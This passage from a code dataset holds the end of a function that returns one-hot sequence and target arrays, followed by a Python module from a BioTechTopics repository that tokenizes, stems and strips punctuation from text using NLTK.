targets1 = targets1[step_i,:]
targets.append(targets1)
# make arrays
      seqs_1hot = np.array(seqs_1hot)
      targets = np.array(targets, dtype=dtype)

      # return the requested arrays
      if return_inputs and return_outputs:
        return seqs_1hot, targets
      elif return_inputs:
        return seqs_1hot
      else:
        return targets
ryanmdavis/BioTechTopics | BTT_functions.py | Python | mit | 997 | 0.018054 | import string,nltk
from nltk.corpus import stopwords
from nltk.stem.porter import *
def tokenizeAndStemStrings(text):
# turn text to tokens
tokens = nltk.word_tokenize(text)
# remove stop words
tokens_no_sw = [word for word in tokens if not word in stopwords.words('english')]
# stem words
    stemmed = []
stemmer = PorterStemmer()
for item in tokens_no_sw:
# this line converts strings to unicode, so here I do it explicitly
#try:
stemmed.append(stemmer.stem(item))
#except:
# stemmed.append(unicode(item)) # for example, stemmer can't stem aed because it expects a letter before a
# print("stemmer skipped word: " + str(unicode(item)))
return stemmed
def cleanString(x):
return x.translate(str.maketrans('','',string.punctuation)).replace('\n', ' ').replace('\r', ' ')
#return x.encode('ascii','ignore').translate(None, string.punctuation).replace('\n', ' ').replace('\r', ' ')
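# Smoke test sketch (assumes the NLTK 'punkt' and 'stopwords' corpora have
# been downloaded, e.g. via nltk.download()):
if __name__ == '__main__':
    # Stems should come out roughly as ['run', 'experi', 'quickli']
    print(tokenizeAndStemStrings(cleanString("Running experiments, quickly!")))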